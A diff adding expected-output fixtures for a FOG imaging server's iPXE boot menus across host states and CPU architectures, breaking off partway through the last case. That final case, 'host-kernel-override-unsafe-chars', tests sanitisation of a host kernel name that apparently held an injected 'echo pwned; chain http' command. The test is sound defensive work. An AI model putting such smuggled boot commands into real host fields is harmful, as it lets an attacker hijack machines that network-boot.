+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+item fog.secureboot Enroll Secure Boot Key
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+chain -ar ${boot-url}/service/ipxe/refind_aa64.efi || goto MENU
+:fog.memtest
+echo Memtest needs memdisk, which is x86-only -- it cannot run on 64-bit ARM.
+sleep 5 || goto MENU
+:fog.reginput
+kernel arm_Image loglevel=4 initrd=arm_init.cpio.gz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch arm_init.cpio.gz
+boot || goto MENU
+:fog.reg
+kernel arm_Image loglevel=4 initrd=arm_init.cpio.gz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch arm_init.cpio.gz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel arm_Image loglevel=4 initrd=arm_init.cpio.gz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch arm_init.cpio.gz
+boot || goto MENU
+:fog.secureboot
+echo Secure Boot signing is not configured on this FOG server.
+echo Nothing to enroll -- returning to the menu...
+sleep 5
+goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## unregistered-no-platform ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+item fog.secureboot Enroll Secure Boot Key
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:fog.secureboot
+echo Secure Boot signing is not configured on this FOG server.
+echo Nothing to enroll -- returning to the menu...
+sleep 5
+goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## registered-bios ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0x00567a 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is registered as testhost!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.keyreg Update Product Key
+item fog.deployimage Deploy Image
+item fog.multijoin Join Multicast Session
+item fog.quickdel Quick Host Deletion
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.keyreg
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param keyreg 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.deployimage
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param qihost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.quickdel
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param delhost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## registered-efi-mok ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0x00567a 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is registered as testhost!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.keyreg Update Product Key
+item fog.deployimage Deploy Image
+item fog.multijoin Join Multicast Session
+item fog.quickdel Quick Host Deletion
+item fog.sysinfo Client System Information (Compatibility)
+item fog.secureboot Enroll Secure Boot Key
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+imgfetch ${boot-url}/service/ipxe/refind.conf
+chain -ar ${boot-url}/service/ipxe/refind_x64.efi || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.keyreg
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param keyreg 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.deployimage
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param qihost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.quickdel
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param delhost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:fog.secureboot
+imgfetch http://10.0.0.1/fog/service/secureboot/MOK.der MOK.der || echo Could not fetch MOK.der over the network.
+echo MOK.der has been downloaded into memory as MOK.der --
+echo look for it under Enroll key from disk.
+echo MokManager gives up after about 10 seconds with no
+echo keypress, and reboots if left idle for a few minutes --
+echo be ready before it appears.
+echo If it is not listed there, have MOK.der on a
+echo FAT-formatted USB stick in this machine instead.
+sleep 8
+chain -ar http://10.0.0.1/fog/service/secureboot/mmx64.efi || echo Could not load the Secure Boot enrolment menu. && sleep 5 && goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## pending-approval ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0x00567a 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is pending approval!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## registered-host-kernel-override ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0x00567a 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is registered as testhost!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.keyreg Update Product Key
+item fog.deployimage Deploy Image
+item fog.multijoin Join Multicast Session
+item fog.quickdel Quick Host Deletion
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.keyreg
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param keyreg 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.deployimage
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param qihost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.quickdel
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param delhost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel custom-bzImage loglevel=4 initrd=custom-init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 nomodeset storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch custom-init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## arm64-host-x86-kernel-override ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+echo Ignoring host kernel custom-bzImage -- this machine is 64-bit ARM. Using arm_Image.
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0x00567a 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is registered as testhost!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.keyreg Update Product Key
+item fog.deployimage Deploy Image
+item fog.multijoin Join Multicast Session
+item fog.quickdel Quick Host Deletion
+item fog.sysinfo Client System Information (Compatibility)
+item fog.secureboot Enroll Secure Boot Key
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+chain -ar ${boot-url}/service/ipxe/refind_aa64.efi || goto MENU
+:fog.memtest
+echo Memtest needs memdisk, which is x86-only -- it cannot run on 64-bit ARM.
+sleep 5 || goto MENU
+:fog.keyreg
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param keyreg 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.deployimage
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param qihost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.quickdel
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param delhost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel arm_Image loglevel=4 initrd=arm_init.cpio.gz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch arm_init.cpio.gz
+boot || goto MENU
+:fog.secureboot
+echo Secure Boot signing is not configured on this FOG server.
+echo Nothing to enroll -- returning to the menu...
+sleep 5
+goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## arm64-host-arm-kernel-override ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0x00567a 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is registered as testhost!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.keyreg Update Product Key
+item fog.deployimage Deploy Image
+item fog.multijoin Join Multicast Session
+item fog.quickdel Quick Host Deletion
+item fog.sysinfo Client System Information (Compatibility)
+item fog.secureboot Enroll Secure Boot Key
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+chain -ar ${boot-url}/service/ipxe/refind_aa64.efi || goto MENU
+:fog.memtest
+echo Memtest needs memdisk, which is x86-only -- it cannot run on 64-bit ARM.
+sleep 5 || goto MENU
+:fog.keyreg
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param keyreg 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.deployimage
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param qihost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.quickdel
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param delhost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel arm_custom_Image loglevel=4 initrd=arm_init.cpio.gz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch arm_init.cpio.gz
+boot || goto MENU
+:fog.secureboot
+echo Secure Boot signing is not configured on this FOG server.
+echo Nothing to enroll -- returning to the menu...
+sleep 5
+goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## x86-host-arm-kernel-override ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+echo Ignoring host init arm_init.cpio.gz -- this machine is x86. Using init.xz.
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0x00567a 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is registered as testhost!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.keyreg Update Product Key
+item fog.deployimage Deploy Image
+item fog.multijoin Join Multicast Session
+item fog.quickdel Quick Host Deletion
+item fog.sysinfo Client System Information (Compatibility)
+item fog.secureboot Enroll Secure Boot Key
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+imgfetch ${boot-url}/service/ipxe/refind.conf
+chain -ar ${boot-url}/service/ipxe/refind_x64.efi || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.keyreg
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param keyreg 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.deployimage
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param qihost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.quickdel
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param delhost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:fog.secureboot
+echo Secure Boot signing is not configured on this FOG server.
+echo Nothing to enroll -- returning to the menu...
+sleep 5
+goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## host-kernel-override-unsafe-chars ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+echo Ignoring host kernel evilechopwnedchainhttpxid -- this machine is 64-bit ARM. Using arm_Image.
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0x00567a 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is registered as testhost!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.keyreg Update Product Key
+item fog.deployimage Deploy Image
+item fog.multijoin Join Multicast Session
+item fog.quickdel Quick Host Deletion
+item fog.sysinfo Client System Information (Compatibility)
+item fog.secureboot Enroll Secure Boot Key
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+chain -ar ${boot-url}/service/ipxe/refind_aa64.efi || goto MENU
+:fog.memtest
